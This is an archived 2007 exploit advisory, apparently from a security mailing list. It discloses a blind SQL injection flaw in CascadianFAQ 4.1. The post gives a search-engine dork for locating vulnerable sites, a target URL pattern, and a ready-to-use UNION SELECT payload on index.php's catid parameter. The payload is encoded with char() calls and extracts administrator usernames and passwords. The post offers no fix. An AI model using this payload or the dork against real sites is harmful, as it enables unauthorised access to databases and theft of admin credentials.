Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

phpBB2 MODificat (phpbb_root_path) Remote File Include Exploit

MyNews 4.2.2 <=  Remote File Include Vulnerability

PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability

EncapsCMS 0.3.6 (common_foot. php) Remote File Include

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	30.01.2007
Subject:	CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability

*******************************************************************************
# Title   :  CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://eclectic-designs.com
# $$      :  Free
# Dork    :  This FAQ is powered by CascadianFAQ
# DorkEx  :  http://www.google.com.tr/search?hl=tr&q=This+FAQ+is+powered+by+CascadianFAQ+
&btnG=Google%27da+Ara&meta=

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//index.php?catid=[SQL]

Example:

//index.php?catid=-1%20union%20select%20concat(char(85),
char(115),char(101),char(114),char(110),
char(97),char(109),char(101),char(58),username,
char(32),char(124),char(124),char(32),
char(80),char(97),char(115),char(115),
char(119),char(111),char(114),char(100),
char(58),password),
2%20from%20cfaq_admin%20where%20accesslevel%20like%201/*


[[/SQL]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!